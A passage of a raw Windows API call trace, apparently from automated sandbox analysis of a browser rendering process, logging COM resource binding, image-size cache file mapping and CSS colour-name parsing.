grfBSCF=0x5, dwSize=0x426, pFormatetc=0x6de7e0, pStgmed=0x6d93d8) returned 0x0 [0159.920] IUnknown:AddRef (This=0x9ef3a70) returned 0x3 [0159.920] IUnknown:QueryInterface (in: This=0x6cb500, riid=0x6d6fe90c*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x197440 | out: ppvObject=0x197440*=0x0) returned 0x80004002 [0159.920] IUnknown:QueryInterface (in: This=0xd5c210, riid=0x6d6fe90c*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x197414 | out: ppvObject=0x197414*=0x0) returned 0x80004002 [0159.920] IUnknown:QueryInterface (in: This=0x6cb500, riid=0x6d6fe934*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x197450 | out: ppvObject=0x197450*=0x0) returned 0x80004002 [0159.920] IUnknown:QueryInterface (in: This=0xd5c210, riid=0x6d6fe934*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x197414 | out: ppvObject=0x197414*=0x0) returned 0x80004002 [0159.920] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x200c) returned 0x9ef65c0 [0159.922] IUnknown:AddRef (This=0x9ef3a70) returned 0x4 [0159.922] IInternetProtocol:Read (in: This=0xd5c22c, pv=0x9ef69f2, cb=0x1bda, pcbRead=0x198fb8 | out: pv=0x9ef69f2, pcbRead=0x198fb8*=0x0) returned 0x1 [0159.922] IUnknown:Release (This=0x9ef3a70) returned 0x3 [0159.922] IUnknown:AddRef (This=0x9ef3a70) returned 0x4 [0159.922] IInternetProtocol:Read (in: This=0xd5c22c, pv=0x9ef69f2, cb=0x1bda, pcbRead=0x198fb8 | out: pv=0x9ef69f2, pcbRead=0x198fb8*=0x0) returned 0x1 [0159.922] IUnknown:Release (This=0x9ef3a70) returned 0x3 [0159.923] IUnknown:Release (This=0x9ef3a70) returned 0x2 [0159.923] IBindStatusCallback:OnStopBinding (This=0xd45110, hresult=0x0, szError=0x0) returned 0x0 [0159.923] IBinding:RemoteGetBindResult (in: This=0x6cb500, pclsidProtocol=0x19908c, pdwResult=0x19907c, pszResult=0x199084, dwReserved=0x0 | out: pclsidProtocol=0x19908c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pdwResult=0x19907c*=0x0, pszResult=0x199084*=0x0) returned 0x0 [0159.923] IUri:GetScheme (in: This=0x9ee0784, pdwScheme=0x19906c | out: pdwScheme=0x19906c*=0x12) returned 0x0 [0159.923] IUri:GetSchemeName (in: This=0x9ee0784, pbstrSchemeName=0x199070 | out: pbstrSchemeName=0x199070*="res") returned 0x0 [0159.923] _wcsnicmp (_String1="res", _String2="mhtml", _MaxCount=0x5) returned 5 [0159.923] CoTaskMemFree (pv=0x0) [0159.924] IInternetProtocolSink:ReportResult (This=0x9ef1628, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0159.924] IInternetProtocolRoot:Terminate (This=0xd5c22c, dwOptions=0x0) returned 0x0 [0159.924] IUnknown:Release (This=0x9ef1630) returned 0x9 [0159.924] IUnknown:Release (This=0x9ef1628) returned 0x8 [0159.924] ReleaseBindInfo (pbindinfo=0xd5c250) [0159.924] FreeLibrary (hLibModule=0x6ed00000) returned 1 [0159.924] CloseHandle (hObject=0x540) returned 1 [0159.926] IUnknown:Release (This=0x6d8428) returned 0x0 [0159.926] CoTaskMemFree (pv=0x6dcb40) [0159.926] IUnknown:Release (This=0xd5c22c) returned 0x6 [0159.926] IUnknown:Release (This=0x9ef1630) returned 0x6 [0159.926] IUnknown:Release (This=0xd5c210) returned 0x1 [0159.926] IUnknown:Release (This=0x9ef3a70) returned 0x1 [0159.926] IUnknown:Release (This=0x6c8c18) returned 0x2 [0159.926] IUnknown:Release (This=0x6c8858) returned 0x0 [0159.926] IUnknown:Release (This=0x9ee0784) returned 0x8 [0159.926] IUnknown:Release (This=0x6ce588) returned 0x0 [0159.926] IUnknown:Release (This=0x9ef12d4) returned 0x1 [0159.926] IUnknown:Release (This=0x9ef12d8) returned 0x0 [0159.927] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef12d0 | out: hHeap=0x5e0000) returned 1 [0159.927] IUnknown:Release (This=0x9ee0784) returned 0x7 [0159.927] IUnknown:Release (This=0x9ee0784) returned 0x6 [0159.927] CoTaskMemFree (pv=0x0) [0159.927] GetCurrentProcessId () returned 0xe14 [0159.927] GetCurrentThreadId () returned 0xb48 [0159.927] memcpy_s (in: _Destination=0x199e3c, _DestinationSize=0xc, _Source=0xd451e0, _SourceSize=0xc | out: _Destination=0x199e3c) returned 0x0 [0159.928] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.928] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\MSIMGSIZECacheMutex") returned 0x540 [0159.928] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0xfa0) returned 0x0 [0159.928] OpenFileMappingW (dwDesiredAccess=0xf001f, bInheritHandle=0, lpName="Local\\MSIMGSIZECacheMap") returned 0x0 [0159.943] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67c [0159.944] GetLastError () returned 0x0 [0159.944] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0159.944] SetFilePointer (in: hFile=0x67c, lDistanceToMove=49120, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbfe0 [0159.944] SetEndOfFile (hFile=0x67c) returned 1 [0159.944] CreateFileMappingW (hFile=0x67c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName="Local\\MSIMGSIZECacheMap") returned 0x684 [0159.944] MapViewOfFile (hFileMappingObject=0x684, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbfe0) returned 0x9660000 [0159.949] FlushViewOfFile (lpBaseAddress=0x9660000, dwNumberOfBytesToFlush=0xbfe0) returned 1 [0159.970] ReleaseMutex (hMutex=0x540) returned 1 [0159.970] CloseHandle (hObject=0x540) returned 1 [0159.970] CloseHandle (hObject=0x67c) returned 1 [0160.005] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x6d7f78 [0160.005] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dc8e0 [0160.006] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.006] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4000) returned 0x9ef85d8 [0160.007] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.007] GetActiveProcessorCount (GroupNumber=0xffff) returned 0x4 [0160.008] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.008] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x67c [0160.008] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x540 [0160.008] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6dd5cca0, lpParameter=0xcfe440, dwCreationFlags=0x0, lpThreadId=0xcfe454 | out: lpThreadId=0xcfe454*=0x354) returned 0x688 [0160.011] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.012] GetCurrentThreadId () returned 0xb48 [0160.012] SetEvent (hEvent=0x67c) returned 1 [0160.012] IUnknown:Release (This=0x9ee0784) returned 0x5 [0160.012] IUnknown:AddRef (This=0x9ee0784) returned 0x6 [0160.013] IUnknown:Release (This=0x9ee0784) returned 0x5 [0160.016] GetCurrentThreadId () returned 0xb48 [0160.017] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.017] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3c) returned 0x6db2c8 [0160.017] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.017] IUnknown:Release (This=0x9ee0864) returned 0x3 [0160.017] _wcsnicmp (_String1="res:", _String2="data", _MaxCount=0x4) returned 14 [0160.018] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.019] GetFocus () returned 0x103e2 [0160.020] EnumChildWindows (hWndParent=0x103ba, lpEnumFunc=0x6e0775e0, lParam=0x19a197) returned 0 [0160.020] GetCurrentThreadId () returned 0xb48 [0160.020] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3097883916173) returned 1 [0160.021] SetEvent (hEvent=0x304) returned 1 [0160.021] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.021] RegisterDragDrop (hwnd=0x103e2, pDropTarget=0xcfa8e0) returned 0x0 [0160.034] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a200 | out: lpPoint=0x19a200) returned 1 [0160.034] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.034] GetCurrentThreadId () returned 0xb48 [0160.035] GetCurrentThreadId () returned 0xb48 [0160.035] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0160.036] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.036] GetCurrentThreadId () returned 0xb48 [0160.036] GetCurrentThreadId () returned 0xb48 [0160.036] GetFocus () returned 0x103e2 [0160.036] GetCurrentThreadId () returned 0xb48 [0160.036] IsWinEventHookInstalled (event=0x8005) returned 0 [0160.036] GetCurrentThreadId () returned 0xb48 [0160.037] GetCurrentThreadId () returned 0xb48 [0160.037] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3097885601352) returned 1 [0160.037] GetCurrentThreadId () returned 0xb48 [0160.037] GetCurrentThreadId () returned 0xb48 [0160.037] GetCurrentThreadId () returned 0xb48 [0160.037] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d94b0 [0160.037] HashData (in: pbData=0x6d94b0, cbData=0x1, pbHash=0x199e60, cbHash=0x2 | out: pbHash=0x199e60) returned 0x0 [0160.037] HashData (in: pbData=0x199e5c, cbData=0x4, pbHash=0x199e68, cbHash=0x2 | out: pbHash=0x199e68) returned 0x0 [0160.038] HashData (in: pbData=0x6d94b4, cbData=0xc, pbHash=0x199e64, cbHash=0x2 | out: pbHash=0x199e64) returned 0x0 [0160.038] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d94b0 | out: hHeap=0x5e0000) returned 1 [0160.038] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d94b0 [0160.038] HashData (in: pbData=0x6d94b0, cbData=0x1, pbHash=0x199e60, cbHash=0x2 | out: pbHash=0x199e60) returned 0x0 [0160.038] HashData (in: pbData=0x199e5c, cbData=0x4, pbHash=0x199e68, cbHash=0x2 | out: pbHash=0x199e68) returned 0x0 [0160.038] HashData (in: pbData=0x6d94b4, cbData=0xc, pbHash=0x199e64, cbHash=0x2 | out: pbHash=0x199e64) returned 0x0 [0160.038] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d94b0 | out: hHeap=0x5e0000) returned 1 [0160.038] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.039] LsSetDoc () returned 0x0 [0160.039] LsCreateLine () returned 0x0 [0160.039] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.039] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.043] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.044] GetProcAddress (hModule=0x65d00000, lpProcName=0x14) returned 0x65d02bc0 [0160.045] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x198ac8 | out: lpflOldProtect=0x198ac8*=0x4) returned 1 [0160.047] LsdnFinishRegular () returned 0x0 [0160.047] LsQueryLineDup () returned 0x0 [0160.047] IOleInPlaceFrame:SetMenu (This=0xd0ec80, hmenuShared=0x0, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0160.048] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.049] GetProcAddress (hModule=0x65d00000, lpProcName=0x2a) returned 0x65d042d0 [0160.050] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x198cf0 | out: lpflOldProtect=0x198cf0*=0x4) returned 1 [0160.050] LsQueryLineCpPpoint () returned 0x0 [0160.051] LsDestroyLine () returned 0x0 [0160.051] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0160.051] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.052] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.053] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.053] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0160.053] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.053] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.053] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.054] IsCharSpaceW (wch=0x62) returned 0 [0160.054] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.054] IsCharSpaceW (wch=0x3a) returned 0 [0160.054] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.054] IsCharSpaceW (wch=0x20) returned 1 [0160.054] IsCharSpaceW (wch=0x74) returned 0 [0160.054] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.054] IsCharSpaceW (wch=0x3b) returned 0 [0160.054] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.054] IsCharSpaceW (wch=0x20) returned 1 [0160.054] IsCharSpaceW (wch=0x66) returned 0 [0160.054] IsCharSpaceW (wch=0x65) returned 0 [0160.054] IsCharSpaceW (wch=0x74) returned 0 [0160.054] IsCharSpaceW (wch=0x74) returned 0 [0160.054] IsCharSpaceW (wch=0x65) returned 0 [0160.054] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.054] IsCharSpaceW (wch=0x74) returned 0 [0160.055] IsCharSpaceW (wch=0x68) returned 0 [0160.055] IsCharSpaceW (wch=0x72) returned 0 [0160.055] IsCharSpaceW (wch=0x65) returned 0 [0160.055] IsCharSpaceW (wch=0x65) returned 0 [0160.055] IsCharSpaceW (wch=0x64) returned 0 [0160.055] IsCharSpaceW (wch=0x66) returned 0 [0160.055] IsCharSpaceW (wch=0x61) returned 0 [0160.055] IsCharSpaceW (wch=0x63) returned 0 [0160.055] IsCharSpaceW (wch=0x65) returned 0 [0160.055] IsCharSpaceW (wch=0x68) returned 0 [0160.055] IsCharSpaceW (wch=0x72) returned 0 [0160.055] IsCharSpaceW (wch=0x65) returned 0 [0160.055] IsCharSpaceW (wch=0x65) returned 0 [0160.055] IsCharSpaceW (wch=0x64) returned 0 [0160.055] IsCharSpaceW (wch=0x66) returned 0 [0160.055] IsCharSpaceW (wch=0x61) returned 0 [0160.055] IsCharSpaceW (wch=0x63) returned 0 [0160.055] IsCharSpaceW (wch=0x65) returned 0 [0160.055] bsearch (_Key=0x199928, _Base=0x6d81eaa8, _NumOfElements=0x94, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x0 [0160.055] _wcsnicmp (_String1="threedface", _String2="lightgrey", _MaxCount=0xa) returned 8 [0160.056] _wcsnicmp (_String1="threedface", _String2="paleturquo", _MaxCount=0xa) returned 4 [0160.056] _wcsnicmp (_String1="threedface", _String2="silver", _MaxCount=0xa) returned 1 [0160.056] _wcsnicmp (_String1="threedface", _String2="teal", _MaxCount=0xa) returned 3 [0160.056] _wcsnicmp (_String1="threedface", _String2="wheat", _MaxCount=0xa) returned -3 [0160.056] _wcsnicmp (_String1="threedface", _String2="tomato", _MaxCount=0xa) returned -7 [0160.056] _wcsnicmp (_String1="threedface", _String2="thistle", _MaxCount=0xa) returned 9 [0160.056] bsearch (_Key=0x199928, _Base=0x6d81e9c0, _NumOfElements=0x1d, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x6d81ea70 [0160.056] _wcsnicmp (_String1="threedface", _String2="inactiveca", _MaxCount=0xa) returned 11 [0160.056] _wcsnicmp (_String1="threedface", _String2="threeddark", _MaxCount=0xa) returned 2 [0160.056] _wcsnicmp (_String1="threedface", _String2="threedshad", _MaxCount=0xa) returned -13 [0160.056] _wcsnicmp (_String1="threedface", _String2="threedhigh", _MaxCount=0xa) returned -2 [0160.056] _wcsnicmp (_String1="threedface", _String2="threedface", _MaxCount=0xa) returned 0 [0160.056] IsCharSpaceW (wch=0x0) returned 0 [0160.056] _wcsnicmp (_String1="none", _String2="none", _MaxCount=0x4) returned 0 [0160.056] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6d20 [0160.057] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.057] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.057] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.057] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.057] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.057] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6dca20 [0160.058] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.058] IsCharSpaceW (wch=0x3a) returned 0 [0160.058] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.058] IsCharSpaceW (wch=0x20) returned 1 [0160.058] IsCharSpaceW (wch=0x6d) returned 0 [0160.058] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.058] IsCharSpaceW (wch=0x20) returned 1 [0160.058] IsCharSpaceW (wch=0x73) returned 0 [0160.058] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.058] IsCharSpaceW (wch=0x20) returned 1 [0160.058] IsCharSpaceW (wch=0x73) returned 0 [0160.058] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.058] IsCharSpaceW (wch=0x3b) returned 0 [0160.058] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.058] IsCharSpaceW (wch=0xd) returned 1 [0160.058] IsCharSpaceW (wch=0xa) returned 1 [0160.058] IsCharSpaceW (wch=0x66) returned 0 [0160.058] IsCharSpaceW (wch=0x66) returned 0 [0160.058] IsCharSpaceW (wch=0x6d) returned 0 [0160.059] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef39f8 [0160.059] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.059] IsCharSpaceW (wch=0x3a) returned 0 [0160.059] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.059] IsCharSpaceW (wch=0x20) returned 1 [0160.059] IsCharSpaceW (wch=0x38) returned 0 [0160.059] IsCharAlphaNumericW (ch=0x38) returned 1 [0160.059] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.059] IsCharSpaceW (wch=0x3b) returned 0 [0160.059] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.059] IsCharSpaceW (wch=0x20) returned 1 [0160.059] IsCharSpaceW (wch=0x6d) returned 0 [0160.059] IsCharSpaceW (wch=0x74) returned 0 [0160.060] IsCharSpaceW (wch=0x38) returned 0 [0160.060] IsCharSpaceW (wch=0x38) returned 0 [0160.060] IsCharSpaceW (wch=0x74) returned 0 [0160.060] IsCharSpaceW (wch=0x38) returned 0 [0160.060] IsCharSpaceW (wch=0x70) returned 0 [0160.060] IsCharSpaceW (wch=0x74) returned 0 [0160.060] IsCharSpaceW (wch=0x0) returned 0 [0160.060] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.060] IsCharSpaceW (wch=0x3a) returned 0 [0160.060] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.060] IsCharSpaceW (wch=0x20) returned 1 [0160.060] IsCharSpaceW (wch=0x31) returned 0 [0160.060] IsCharAlphaNumericW (ch=0x31) returned 1 [0160.060] IsCharAlphaNumericW (ch=0x2e) returned 0 [0160.060] IsCharSpaceW (wch=0x2e) returned 0 [0160.060] IsCharAlphaNumericW (ch=0x2e) returned 0 [0160.060] IsCharAlphaNumericW (ch=0x35) returned 1 [0160.060] IsCharAlphaNumericW (ch=0x0) returned 0 [0160.061] IsCharSpaceW (wch=0x6d) returned 0 [0160.061] IsCharSpaceW (wch=0x31) returned 0 [0160.061] IsCharSpaceW (wch=0x31) returned 0 [0160.061] IsCharSpaceW (wch=0x6d) returned 0 [0160.061] IsCharSpaceW (wch=0x31) returned 0 [0160.061] IsCharSpaceW (wch=0x65) returned 0 [0160.061] IsCharSpaceW (wch=0x6d) returned 0 [0160.061] IsCharSpaceW (wch=0x0) returned 0 [0160.061] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.061] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6cb0 [0160.061] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.061] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x9ef3a48 [0160.061] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.062] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.062] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.062] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0160.062] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.062] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.062] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.062] IsCharSpaceW (wch=0x62) returned 0 [0160.062] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.062] IsCharSpaceW (wch=0x3a) returned 0 [0160.063] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.063] IsCharSpaceW (wch=0x20) returned 1 [0160.063] IsCharSpaceW (wch=0x62) returned 0 [0160.063] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.063] IsCharSpaceW (wch=0x3b) returned 0 [0160.063] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.063] IsCharSpaceW (wch=0x20) returned 1 [0160.063] IsCharSpaceW (wch=0x66) returned 0 [0160.063] IsCharSpaceW (wch=0x65) returned 0 [0160.063] IsCharSpaceW (wch=0x62) returned 0 [0160.063] IsCharSpaceW (wch=0x62) returned 0 [0160.064] IsCharSpaceW (wch=0x65) returned 0 [0160.064] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.064] IsCharSpaceW (wch=0x62) returned 0 [0160.064] IsCharSpaceW (wch=0x75) returned 0 [0160.064] IsCharSpaceW (wch=0x74) returned 0 [0160.065] IsCharSpaceW (wch=0x74) returned 0 [0160.065] IsCharSpaceW (wch=0x6f) returned 0 [0160.065] IsCharSpaceW (wch=0x6e) returned 0 [0160.065] IsCharSpaceW (wch=0x66) returned 0 [0160.065] IsCharSpaceW (wch=0x61) returned 0 [0160.065] IsCharSpaceW (wch=0x63) returned 0 [0160.065] IsCharSpaceW (wch=0x65) returned 0 [0160.065] IsCharSpaceW (wch=0x75) returned 0 [0160.065] IsCharSpaceW (wch=0x74) returned 0 [0160.065] IsCharSpaceW (wch=0x74) returned 0 [0160.065] IsCharSpaceW (wch=0x6f) returned 0 [0160.065] IsCharSpaceW (wch=0x6e) returned 0 [0160.065] IsCharSpaceW (wch=0x66) returned 0 [0160.065] IsCharSpaceW (wch=0x61) returned 0 [0160.065] IsCharSpaceW (wch=0x63) returned 0 [0160.065] IsCharSpaceW (wch=0x65) returned 0 [0160.065] bsearch (_Key=0x199928, _Base=0x6d81eaa8, _NumOfElements=0x94, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x0 [0160.065] _wcsnicmp (_String1="buttonface", _String2="lightgrey", _MaxCount=0xa) returned -10 [0160.066] _wcsnicmp (_String1="buttonface", _String2="darkslateg", _MaxCount=0xa) returned -2 [0160.066] _wcsnicmp (_String1="buttonface", _String2="cornflower", _MaxCount=0xa) returned -1 [0160.066] _wcsnicmp (_String1="buttonface", _String2="blanchedal", _MaxCount=0xa) returned 9 [0160.066] _wcsnicmp (_String1="buttonface", _String2="burlywood", _MaxCount=0xa) returned 2 [0160.066] _wcsnicmp (_String1="buttonface", _String2="chartreuse", _MaxCount=0xa) returned -1 [0160.066] _wcsnicmp (_String1="buttonface", _String2="cadetblue", _MaxCount=0xa) returned -1 [0160.066] bsearch (_Key=0x199928, _Base=0x6d81e9c0, _NumOfElements=0x1d, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x6d81e9e8 [0160.066] _wcsnicmp (_String1="buttonface", _String2="inactiveca", _MaxCount=0xa) returned -7 [0160.066] _wcsnicmp (_String1="buttonface", _String2="buttonhigh", _MaxCount=0xa) returned -2 [0160.066] _wcsnicmp (_String1="buttonface", _String2="activecapt", _MaxCount=0xa) returned 1 [0160.066] _wcsnicmp (_String1="buttonface", _String2="background", _MaxCount=0xa) returned 20 [0160.066] _wcsnicmp (_String1="buttonface", _String2="buttonface", _MaxCount=0xa) returned 0 [0160.066] IsCharSpaceW (wch=0x0) returned 0 [0160.066] _wcsnicmp (_String1="none", _String2="none", _MaxCount=0x4) returned 0 [0160.066] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6c90 [0160.067] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.067] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.067] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.067] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.067] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.067] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6dc9c0 [0160.067] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.068] IsCharSpaceW (wch=0x3a) returned 0 [0160.068] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.068] IsCharSpaceW (wch=0x20) returned 1 [0160.068] IsCharSpaceW (wch=0x6d) returned 0 [0160.068] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.068] IsCharSpaceW (wch=0x20) returned 1 [0160.068] IsCharSpaceW (wch=0x73) returned 0 [0160.068] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.068] IsCharSpaceW (wch=0x20) returned 1 [0160.068] IsCharSpaceW (wch=0x73) returned 0 [0160.068] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.068] IsCharSpaceW (wch=0x3b) returned 0 [0160.068] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.068] IsCharSpaceW (wch=0x20) returned 1 [0160.068] IsCharSpaceW (wch=0x66) returned 0 [0160.068] IsCharSpaceW (wch=0x66) returned 0 [0160.068] IsCharSpaceW (wch=0x6d) returned 0 [0160.069] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3ac0 [0160.069] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.069] IsCharSpaceW (wch=0x3a) returned 0 [0160.069] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.069] IsCharSpaceW (wch=0x20) returned 1 [0160.069] IsCharSpaceW (wch=0x38) returned 0 [0160.069] IsCharAlphaNumericW (ch=0x38) returned 1 [0160.069] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.069] IsCharSpaceW (wch=0x3b) returned 0 [0160.069] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.069] IsCharSpaceW (wch=0xd) returned 1 [0160.069] IsCharSpaceW (wch=0xa) returned 1 [0160.069] IsCharSpaceW (wch=0x6d) returned 0 [0160.069] IsCharSpaceW (wch=0x74) returned 0 [0160.069] IsCharSpaceW (wch=0x38) returned 0 [0160.069] 